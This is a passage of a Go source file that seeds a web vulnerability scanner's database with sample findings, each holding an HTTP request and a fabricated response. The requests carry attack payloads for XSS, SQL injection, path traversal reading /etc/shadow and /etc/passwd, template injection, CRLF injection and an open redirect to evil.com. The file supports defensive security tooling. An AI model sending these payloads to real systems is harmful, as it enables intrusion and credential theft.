package cli

import (
	"math/rand"
	"strings"
	"time"

	"github.com/xevonlive-dev/xevon/pkg/database"
)

// ---------------------------------------------------------------------------
// Finding seeds
// ---------------------------------------------------------------------------

func seedFindings(rng *rand.Rand, records []*database.HTTPRecord) []*database.Finding {
	now := time.Now()

	// Helper to look up a record UUID by a path substring.
	findRec := func(pathContains string) string {
		for _, r := range records {
			if strings.Contains(r.Path, pathContains) && r.Hostname != "unreachable.internal" {
				return r.UUID
			}
		}
		return records[0].UUID
	}

	findings := []*database.Finding{
		// Reflected XSS on example.com/search
		{
			HTTPRecordUUIDs:  []string{findRec("script>alert")},
			ModuleID:         "xss-reflected-param",
			ModuleName:       "xss",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects reflected cross-site scripting via parameter injection",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Reflected XSS via 'q' parameter — user input is echoed into the HTML response without encoding",
			Severity:         "high",
			Confidence:       "firm",
			Tags:             []string{"xss", "reflected", "owasp-a7"},
			MatchedAt:        []string{"https://example.com/search?q=<script>alert(1)</script>&page=1"},
			ExtractedResults: []string{"<script>alert(1)</script>"},
			Request:          "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E&page=1 HTTP/1.1\r\nHost: example.com\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Search Results</title></head>\n<body>\n<h1>Search Results</h1>\n<p>You searched for: <script>alert(1)</script></p>\n<p>No results found for your query.</p>\n</body></html>",
			FindingHash:      hashStr([]byte("xss-reflected-param-example.com-/search-q")),
			FoundAt:          now.Add(-110 * time.Minute),
			CreatedAt:        now.Add(-110 * time.Minute),
		},
		// Reflected XSS on blog.test/search
		{
			HTTPRecordUUIDs:  []string{findRec("onerror=alert")},
			ModuleID:         "xss-reflected-param",
			ModuleName:       "xss",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects reflected cross-site scripting via parameter injection",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Reflected XSS via 'q' parameter — img tag with onerror handler rendered in response",
			Severity:         "high",
			Confidence:       "firm",
			Tags:             []string{"xss", "reflected", "owasp-a7"},
			MatchedAt:        []string{"https://blog.test/search?q=<img+src=x+onerror=alert(1)>"},
			ExtractedResults: []string{"<img src=x onerror=alert(1)>"},
			Request:          "GET /search?q=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1\r\nHost: blog.test\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Search Results</title></head>\n<body>\n<h1>Search Results</h1>\n<p>You searched for: <img src=x onerror=alert(1)></p>\n<p>No results found.</p>\n</body></html>",
			FindingHash:      hashStr([]byte("xss-reflected-param-blog.test-/search-q")),
			FoundAt:          now.Add(-8 * time.Minute),
			CreatedAt:        now.Add(-8 * time.Minute),
		},
		// SQL injection on api.shop.local
		{
			HTTPRecordUUIDs:  []string{findRec("UNION+SELECT")},
			ModuleID:         "sqli-union-based",
			ModuleName:       "sqli",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects SQL injection via UNION SELECT statement",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Union-based SQL injection in 'search' parameter — database contents leaked via UNION SELECT",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"sqli", "union-based", "owasp-a3"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/products?search='+UNION+SELECT+1,2,3--"},
			ExtractedResults: []string{"1", "2", "3"},
			Request:          "GET /api/v1/products?search=%27+UNION+SELECT+1%2C2%2C3-- HTTP/1.1\r\nHost: api.shop.local\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"results\":[{\"id\":1,\"name\":\"admin\",\"price\":\"s3cr3t_p@ssw0rd\"},{\"id\":2,\"name\":\"root\",\"price\":\"r00t_p@ss!\"},{\"id\":3,\"name\":\"db_version\",\"price\":\"PostgreSQL 14.2\"}],\"total\":3}",
			AdditionalEvidence: []string{
				"GET /api/v1/products?search=%27+UNION+SELECT+1%2C2-- HTTP/1.1\r\nHost: api.shop.local\r\n\r\n\n---------\nHTTP/1.1 500 Internal Server Error\r\nContent-Type: application/json\r\n\r\n{\"error\":\"UNION query must have same number of columns\"}",
				"GET /api/v1/products?search=%27+UNION+SELECT+1%2C2%2C3%2C4-- HTTP/1.1\r\nHost: api.shop.local\r\n\r\n\n---------\nHTTP/1.1 500 Internal Server Error\r\nContent-Type: application/json\r\n\r\n{\"error\":\"UNION query must have same number of columns\"}",
			},
			FindingHash: hashStr([]byte("sqli-union-api.shop.local-/api/v1/products-search")),
			FoundAt:     now.Add(-4*time.Hour - 20*time.Minute),
			CreatedAt:   now.Add(-4*time.Hour - 20*time.Minute),
		},
		// Error-based SQL injection on api.shop.local
		{
			HTTPRecordUUIDs:  []string{findRec("1' OR 1=1--")},
			ModuleID:         "sqli-error-based",
			ModuleName:       "sqli",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects SQL injection via database error messages",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Error-based SQL injection — database error message leaked in response",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"sqli", "error-based", "owasp-a3"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/users/1' OR 1=1--"},
			ExtractedResults: []string{"near \"OR\": syntax error"},
			Request:          "GET /api/v1/users/1'+OR+1%3D1-- HTTP/1.1\r\nHost: api.shop.local\r\n\r\n",
			Response:         "HTTP/1.1 500 Internal Server Error\r\nContent-Type: application/json\r\n\r\n{\"error\":\"near \\\"OR\\\": syntax error\",\"detail\":\"SELECT * FROM users WHERE id = '1' OR 1=1--'\",\"code\":\"SQLITE_ERROR\"}",
			FindingHash:      hashStr([]byte("sqli-error-api.shop.local-/api/v1/users")),
			FoundAt:          now.Add(-4*time.Hour - 15*time.Minute),
			CreatedAt:        now.Add(-4*time.Hour - 15*time.Minute),
		},
		// LFI on admin panel
		{
			HTTPRecordUUIDs:  []string{findRec("/admin/logs?file=")},
			ModuleID:         "lfi-path-traversal",
			ModuleName:       "lfi",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects local file inclusion via path traversal",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Local file inclusion via 'file' parameter — /etc/shadow contents readable",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"lfi", "path-traversal", "owasp-a1"},
			MatchedAt:        []string{"https://admin.example.com:8443/admin/logs?file=../../../etc/shadow"},
			ExtractedResults: []string{"root:$6$rounds=656000$ABC123$XYZhashvalue:18000:0:99999:7:::"},
			Request:          "GET /admin/logs?file=../../../etc/shadow HTTP/1.1\r\nHost: admin.example.com:8443\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nroot:$6$rounds=656000$ABC123$XYZhashvalue:18000:0:99999:7:::\ndaemon:*:18000:0:99999:7:::\nbin:*:18000:0:99999:7:::\nwww-data:$6$rounds=656000$DEF456$ABChashvalue:18200:0:99999:7:::\npostgres:$6$rounds=656000$GHI789$DEFhashvalue:18300:0:99999:7:::",
			AdditionalEvidence: []string{
				"GET /admin/logs?file=../../../etc/passwd HTTP/1.1\r\nHost: admin.example.com:8443\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n\n---------\nHTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
				"GET /admin/logs?file=../../../etc/hostname HTTP/1.1\r\nHost: admin.example.com:8443\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n\n---------\nHTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nprod-web-01.example.com",
			},
			FindingHash: hashStr([]byte("lfi-path-admin.example.com-/admin/logs-file")),
			FoundAt:     now.Add(-100 * time.Minute),
			CreatedAt:   now.Add(-100 * time.Minute),
		},
		// LFI on legacy
		{
			HTTPRecordUUIDs:  []string{findRec("page=../")},
			ModuleID:         "lfi-path-traversal",
			ModuleName:       "lfi",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects local file inclusion via path traversal",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Local file inclusion via 'page' parameter — /etc/passwd contents included in page output",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"lfi", "path-traversal", "owasp-a1"},
			MatchedAt:        []string{"http://legacy.example.com/index.php?page=../../../etc/passwd"},
			ExtractedResults: []string{"root:x:0:0:root:/root:/bin/bash"},
			Request:          "GET /index.php?page=../../../etc/passwd HTTP/1.1\r\nHost: legacy.example.com\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: Apache/2.2\r\nX-Powered-By: PHP/5.6\r\n\r\n<!DOCTYPE html>\n<html><head><title>Legacy Portal</title></head>\n<body>\n<div class=\"content\">root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\npostgres:x:109:117:PostgreSQL administrator:/var/lib/postgresql:/bin/bash</div>\n</body></html>",
			FindingHash:      hashStr([]byte("lfi-path-legacy.example.com-/index.php-page")),
			FoundAt:          now.Add(-90 * time.Minute),
			CreatedAt:        now.Add(-90 * time.Minute),
		},
		// SSTI on admin settings
		{
			HTTPRecordUUIDs:  []string{findRec("debug={{7*7}}")},
			ModuleID:         "ssti-expression-eval",
			ModuleName:       "ssti",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects server-side template injection via expression evaluation",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Server-side template injection in 'debug' parameter — expression {{7*7}} evaluated to 49",
			Severity:         "high",
			Confidence:       "certain",
			Tags:             []string{"ssti", "template-injection", "owasp-a3"},
			MatchedAt:        []string{"https://admin.example.com:8443/admin/settings"},
			ExtractedResults: []string{"49"},
			Request:          "POST /admin/settings HTTP/1.1\r\nHost: admin.example.com:8443\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsmtp_host=mail.example.com&smtp_port=587&debug={{7*7}}",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Settings Saved — Admin</title></head>\n<body>\n<h1>Settings Updated</h1>\n<div class=\"flash success\">Settings saved successfully.</div>\n<table>\n<tr><td>SMTP Host</td><td>mail.example.com</td></tr>\n<tr><td>SMTP Port</td><td>587</td></tr>\n<tr><td>Debug</td><td>49</td></tr>\n</table>\n</body></html>",
			FindingHash:      hashStr([]byte("ssti-admin.example.com-/admin/settings-debug")),
			FoundAt:          now.Add(-95 * time.Minute),
			CreatedAt:        now.Add(-95 * time.Minute),
		},
		// CRLF injection
		{
			HTTPRecordUUIDs:  []string{findRec("Injected-Header")},
			ModuleID:         "crlf-header-injection",
			ModuleName:       "crlf",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects CRLF injection in HTTP response headers",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "CRLF injection in 'format' parameter — arbitrary HTTP header injected into response",
			Severity:         "medium",
			Confidence:       "firm",
			Tags:             []string{"crlf", "header-injection", "owasp-a3"},
			MatchedAt:        []string{"https://admin.example.com:8443/admin/export?format=csv\\r\\nInjected-Header: evil"},
			ExtractedResults: []string{"Injected-Header: evil"},
			Request:          "GET /admin/export?format=csv%0d%0aInjected-Header:%20evil HTTP/1.1\r\nHost: admin.example.com:8443\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/csv\r\nInjected-Header: evil\r\nContent-Disposition: attachment; filename=export.csv\r\n\r\nid,name,email,role\n1,admin,admin@example.com,administrator\n2,john,john@example.com,user\n3,jane,jane@example.com,editor",
			FindingHash:      hashStr([]byte("crlf-admin.example.com-/admin/export-format")),
			FoundAt:          now.Add(-98 * time.Minute),
			CreatedAt:        now.Add(-98 * time.Minute),
		},
		// Open redirect
		{
			HTTPRecordUUIDs:  []string{findRec("url=https://evil.com")},
			ModuleID:         "open-redirect",
			ModuleName:       "openredirect",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects open redirect via URL parameter manipulation",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Open redirect via 'url' parameter — user can be redirected to arbitrary external domains",
			Severity:         "medium",
			Confidence:       "firm",
			Tags:             []string{"open-redirect", "owasp-a1"},
			MatchedAt:        []string{"http://legacy.example.com/redirect?url=https://evil.com"},
			ExtractedResults: []string{"https://evil.com"},
			Request:          "GET /redirect?url=https://evil.com HTTP/1.1\r\nHost: legacy.example.com\r\n\r\n",
			Response:         "HTTP/1.1 302 Found\r\nLocation: https://evil.com\r\n\r\n",
			FindingHash:      hashStr([]byte("openredirect-legacy.example.com-/redirect-url")),
			FoundAt:          now.Add(-88 * time.Minute),
			CreatedAt:        now.Add(-88 * time.Minute),
		},
		// Information disclosure — server version
		{
			HTTPRecordUUIDs:  []string{findRec("/cgi-bin/submit")},
			ModuleID:         "info-server-version",
			ModuleName:       "info",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects server version disclosure in response headers",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Server version disclosure — Apache/2.2 and PHP/5.6 revealed in response headers (both are end-of-life)",
			Severity:         "low",
			Confidence:       "firm",
			Tags:             []string{"info", "server-version", "eol"},
			MatchedAt:        []string{"http://legacy.example.com/cgi-bin/submit.cgi"},
			ExtractedResults: []string{"Server: Apache/2.2", "X-Powered-By: PHP/5.6"},
			Request:          "POST /cgi-bin/submit.cgi HTTP/1.1\r\nHost: legacy.example.com\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nServer: Apache/2.2\r\nX-Powered-By: PHP/5.6\r\nContent-Type: text/html\r\n\r\n<html><head><title>Form Submitted</title></head>\n<body>\n<h1>Form Submitted Successfully</h1>\n<p>Thank you for your submission.</p>\n<p>Name: test</p>\n<p>Value: data</p>\n</body></html>",
			FindingHash:      hashStr([]byte("info-server-version-legacy.example.com")),
			FoundAt:          now.Add(-85 * time.Minute),
			CreatedAt:        now.Add(-85 * time.Minute),
		},
		// Missing security headers
		{
			HTTPRecordUUIDs:  []string{findRec("/post/hello-world")},
			ModuleID:         "info-missing-headers",
			ModuleName:       "info",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects missing security headers in HTTP responses",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Missing security headers: X-Content-Type-Options, X-Frame-Options, Content-Security-Policy",
			Severity:         "info",
			Confidence:       "firm",
			Tags:             []string{"info", "headers", "best-practice"},
			MatchedAt:        []string{"https://blog.test/post/hello-world"},
			ExtractedResults: []string{"X-Content-Type-Options: missing", "X-Frame-Options: missing", "Content-Security-Policy: missing"},
			Request:          "GET /post/hello-world HTTP/1.1\r\nHost: blog.test\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\nServer: Apache/2.4\r\n\r\n<!DOCTYPE html>\n<html><head><title>Hello World — Blog</title></head>\n<body>\n<article><h1>Hello World</h1></article>\n</body></html>",
			FindingHash:      hashStr([]byte("info-missing-headers-blog.test-/post/hello-world")),
			FoundAt:          now.Add(-7 * time.Minute),
			CreatedAt:        now.Add(-7 * time.Minute),
		},
		// Sensitive data in response (API key leak)
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/users/me")},
			ModuleID:         "info-sensitive-data",
			ModuleName:       "info",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects sensitive data exposure in API responses",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "API response includes internal API key in user profile object",
			Severity:         "medium",
			Confidence:       "firm",
			Tags:             []string{"info", "sensitive-data", "api-key"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/users/me"},
			ExtractedResults: []string{"api_key: sk-live-abc123xyz789def456"},
			Request:          "GET /api/v1/users/me HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"id\":1,\"email\":\"user@shop.local\",\"name\":\"Shop Admin\",\"role\":\"admin\",\"api_key\":\"sk-live-abc123xyz789def456\",\"created_at\":\"2025-11-15T09:00:00Z\",\"last_login\":\"2026-02-25T08:30:00Z\"}",
			FindingHash:      hashStr([]byte("info-sensitive-data-api.shop.local-/api/v1/users/me")),
			FoundAt:          now.Add(-4*time.Hour - 10*time.Minute),
			CreatedAt:        now.Add(-4*time.Hour - 10*time.Minute),
		},
		// Backslash transformation on search parameter
		{
			HTTPRecordUUIDs:  []string{findRec("/search?q=test")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "backslash-transformation",
			ModuleName:       "backslash-transformation",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects backslash escape sequence interpretation",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Backslash consumed in 'q' parameter — injected \\x41 transformed to 'A', indicating escape sequence interpretation",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "backslash", "escape-sequence"},
			MatchedAt:        []string{"https://example.com/search?q=\\x41"},
			ExtractedResults: []string{"\\x41 → A"},
			Request:          "GET /search?q=%5Cx41 HTTP/1.1\r\nHost: example.com\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Search Results</title></head>\n<body>\n<h1>Search Results</h1>\n<p>You searched for: A</p>\n<p>No results found.</p>\n</body></html>",
			FindingHash:      hashStr([]byte("backslash-transform-example.com-/search-q")),
			FoundAt:          now.Add(-75 * time.Minute),
			CreatedAt:        now.Add(-75 * time.Minute),
		},
		// Suspect transform — expression evaluation on admin settings
		{
			HTTPRecordUUIDs:  []string{findRec("/admin/settings")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "suspect-transform",
			ModuleName:       "suspect-transform",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects server-side expression evaluation in parameters",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Expression evaluated in 'smtp_port' parameter — injected '3+4' returned '7', suggesting server-side evaluation",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "expression-eval", "suspect-transform"},
			MatchedAt:        []string{"https://admin.example.com:8443/admin/settings"},
			ExtractedResults: []string{"3+4 → 7"},
			Request:          "POST /admin/settings HTTP/1.1\r\nHost: admin.example.com:8443\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsmtp_host=mail.example.com&smtp_port=3+4",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Settings Saved — Admin</title></head>\n<body>\n<h1>Settings Updated</h1>\n<table>\n<tr><td>SMTP Host</td><td>mail.example.com</td></tr>\n<tr><td>SMTP Port</td><td>7</td></tr>\n</table>\n</body></html>",
			FindingHash:      hashStr([]byte("suspect-transform-admin.example.com-/admin/settings-smtp_port")),
			FoundAt:          now.Add(-70 * time.Minute),
			CreatedAt:        now.Add(-70 * time.Minute),
		},
		// Smart behavior detection — differential response on login
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/auth/login")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			ModuleID:         "smart-behavior-detection",
			ModuleName:       "smart-behavior-detection",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects differential behavior suggesting injection context",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Differential behavior in 'username' parameter — semantically equivalent payloads produce different responses (timing delta 850ms), suggesting injection context",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "differential", "timing-anomaly"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/auth/login"},
			ExtractedResults: []string{"timing_delta: 850ms", "status_match: true", "body_diff: 12%"},
			Request:          "POST /api/v1/auth/login HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"username\":\"admin' AND '1'='1\",\"password\":\"test\"}",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"error\":\"Invalid credentials\",\"attempts_remaining\":4}",
			AdditionalEvidence: []string{
				"POST /api/v1/auth/login HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"username\":\"admin' AND '1'='2\",\"password\":\"test\"}\n---------\nHTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"error\":\"Invalid credentials\",\"attempts_remaining\":4}",
				"POST /api/v1/auth/login HTTP/1.1\r\nHost: api.shop.local\r\nContent-Type: application/json\r\n\r\n{\"username\":\"admin\",\"password\":\"test\"}\n---------\nHTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"error\":\"Invalid credentials\",\"attempts_remaining\":5}",
			},
			FindingHash: hashStr([]byte("smart-behavior-api.shop.local-/api/v1/auth/login-username")),
			FoundAt:     now.Add(-65 * time.Minute),
			CreatedAt:   now.Add(-65 * time.Minute),
		},
		// Input behavior probe — HTML structure change on contact form
		{
			HTTPRecordUUIDs:  []string{findRec("/contact")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "input-behavior-probe",
			ModuleName:       "input-behavior-probe",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects HTML structure changes from fuzz payloads",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "HTML tag count changed after injecting fuzz payload in 'message' field — baseline 42 tags vs injected 45 tags, new <img> and <script> elements appeared",
			Severity:         "suspect",
			Confidence:       "tentative",
			Tags:             []string{"behavior", "html-structure", "fuzz-signal"},
			MatchedAt:        []string{"https://example.com/contact"},
			ExtractedResults: []string{"tag_delta: +3", "new_tags: img, script"},
			Request:          "POST /contact HTTP/1.1\r\nHost: example.com\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nname=test&email=test@test.com&message=<img/src=x>",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Contact — Example</title></head>\n<body>\n<h1>Message Received</h1>\n<p>Thank you, test. Your message:</p>\n<div class=\"msg\"><img/src=x></div>\n</body></html>",
			FindingHash:      hashStr([]byte("input-behavior-probe-example.com-/contact-message")),
			FoundAt:          now.Add(-60 * time.Minute),
			CreatedAt:        now.Add(-60 * time.Minute),
		},
		// Anomaly ranking — statistical outlier on API endpoint
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v2/beta/experimental")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			ModuleID:         "anomaly-ranking",
			ModuleName:       "anomaly-ranking",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects statistical outlier responses across host",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Response is a statistical outlier for api.shop.local — body size 120B is 4.2σ below host mean (15420B), unusual content-type for this host",
			Severity:         "suspect",
			Confidence:       "tentative",
			Tags:             []string{"anomaly", "statistical", "outlier"},
			MatchedAt:        []string{"https://api.shop.local/api/v2/beta/experimental"},
			ExtractedResults: []string{"z_score: -4.2", "body_size: 120B", "host_mean: 15420B"},
			Request:          "GET /api/v2/beta/experimental HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"status\":\"ok\",\"version\":\"2.0.0-beta\",\"features\":[\"experimental\"]}",
			FindingHash:      hashStr([]byte("anomaly-ranking-api.shop.local-/api/v2/beta/experimental")),
			FoundAt:          now.Add(-55 * time.Minute),
			CreatedAt:        now.Add(-55 * time.Minute),
		},
		// Wildcard injection — unescaped wildcard changes query behavior
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/products")},
			ScanUUID:         "scan-0002-aaaa-bbbb-cccc-ddddeeee0002",
			ModuleID:         "wildcard-injection",
			ModuleName:       "wildcard-injection",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects wildcard character interpretation in query layer",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Wildcard character '*' in 'search' parameter changes result count from 12 to 847 — backend may interpret wildcards in query layer (LDAP, SQL LIKE, or Elasticsearch)",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "wildcard", "query-manipulation"},
			MatchedAt:        []string{"https://api.shop.local/api/v1/products?search=*"},
			ExtractedResults: []string{"baseline_count: 12", "injected_count: 847", "delta: +835"},
			Request:          "GET /api/v1/products?search=* HTTP/1.1\r\nHost: api.shop.local\r\nAuthorization: Bearer shop-api-token-abc123\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n{\"results\":[...],\"total\":847,\"page\":1}",
			FindingHash:      hashStr([]byte("wildcard-injection-api.shop.local-/api/v1/products-search")),
			FoundAt:          now.Add(-52 * time.Minute),
			CreatedAt:        now.Add(-52 * time.Minute),
		},
		// Response size anomaly — unusually large error response on profile page
		{
			HTTPRecordUUIDs:  []string{findRec("/profile/1")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			ModuleID:         "response-anomaly",
			ModuleName:       "response-anomaly",
			ModuleType:       database.ModuleTypePassive,
			ModuleShort:      "Detects anomalous response size patterns",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Error response body is 3.8x larger than success response for same endpoint — may contain stack trace, debug info, or internal paths",
			Severity:         "suspect",
			Confidence:       "tentative",
			Tags:             []string{"anomaly", "response-size", "error-verbose"},
			MatchedAt:        []string{"https://example.com/profile/1"},
			ExtractedResults: []string{"success_size: 7500B", "error_size: 28500B", "ratio: 3.8x"},
			Request:          "GET /profile/999999 HTTP/1.1\r\nHost: example.com\r\nAuthorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.abc\r\n\r\n",
			Response:         "HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Error</title></head>\n<body>\n<h1>Internal Server Error</h1>\n<pre>Traceback (most recent call last):\n  File \"/app/views/profile.py\", line 42\n    user = db.query(User).filter_by(id=999999).one()\nNoResultFound: No row was found\n</pre>\n</body></html>",
			FindingHash:      hashStr([]byte("response-anomaly-example.com-/profile")),
			FoundAt:          now.Add(-48 * time.Minute),
			CreatedAt:        now.Add(-48 * time.Minute),
		},
		// Timing anomaly — comment endpoint significantly slower with special chars
		{
			HTTPRecordUUIDs:  []string{findRec("/post/hello-world/comment")},
			ScanUUID:         "scan-0003-aaaa-bbbb-cccc-ddddeeee0003",
			ModuleID:         "timing-anomaly",
			ModuleName:       "timing-anomaly",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects timing-based anomalies suggesting blind injection",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Response time for 'body' parameter increased from 220ms baseline to 1850ms when injecting single quote — consistent across 3 retries, suggesting query-layer processing",
			Severity:         "suspect",
			Confidence:       "firm",
			Tags:             []string{"behavior", "timing", "blind-injection"},
			MatchedAt:        []string{"https://blog.test/post/hello-world/comment"},
			ExtractedResults: []string{"baseline_ms: 220", "injected_ms: 1850", "delta_ms: 1630", "retries: 3"},
			Request:          "POST /post/hello-world/comment HTTP/1.1\r\nHost: blog.test\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: session=blogsess123\r\n\r\nauthor=Alice&body=test'&email=alice@test.com",
			Response:         "HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Error</title></head>\n<body>\n<h1>Something went wrong</h1>\n<p>We encountered an unexpected error. Please try again.</p>\n</body></html>",
			AdditionalEvidence: []string{
				"POST /post/hello-world/comment HTTP/1.1\r\nHost: blog.test\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: session=blogsess123\r\n\r\nauthor=Alice&body=test'&email=alice@test.com\n---------\nHTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Error</title></head>\n<body><h1>Something went wrong</h1></body></html>",
				"POST /post/hello-world/comment HTTP/1.1\r\nHost: blog.test\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: session=blogsess123\r\n\r\nauthor=Alice&body=test'&email=alice@test.com\n---------\nHTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Error</title></head>\n<body><h1>Something went wrong</h1></body></html>",
				"POST /post/hello-world/comment HTTP/1.1\r\nHost: blog.test\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: session=blogsess123\r\n\r\nauthor=Alice&body=test&email=alice@test.com\n---------\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html>\n<html><head><title>Comment Posted</title></head>\n<body><h1>Comment posted successfully</h1></body></html>",
			},
